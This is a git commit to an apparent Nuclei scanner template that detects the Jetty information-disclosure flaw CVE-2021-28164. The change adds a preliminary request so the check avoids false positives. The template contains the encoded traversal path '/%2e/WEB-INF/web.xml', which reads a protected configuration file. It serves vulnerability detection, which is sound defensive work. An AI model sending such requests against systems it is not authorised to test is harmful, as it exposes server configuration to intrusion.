fixed FP in CVE-2021-28164

patch-1
Prince Chaddha 2023-11-06 12:50:52 +05:30 committed by GitHub
parent 63c17894e6
commit a3e5df6df6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 1 deletions

View File

@ -28,7 +28,22 @@ info:
product: jetty
tags: vulhub,cve,cve2021,jetty,packetstorm
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/WEB-INF/web.xml"
matchers:
- type: word
part: body
words:
- "</web-app>"
- "java.sun.com"
condition: and
negative: true
- method: GET
path:
- "{{BaseURL}}/%2e/WEB-INF/web.xml"
@ -50,4 +65,3 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022003bd30c55fa8f2e8218980f1f802ddce02e1e25293900726d57eadc8c2759046022100fa7059b3d4b3cb1dad34c592c72b8dad29b0ba964e8b70f6521e92155b602359:922c64590222798bb761d5b6d8e72950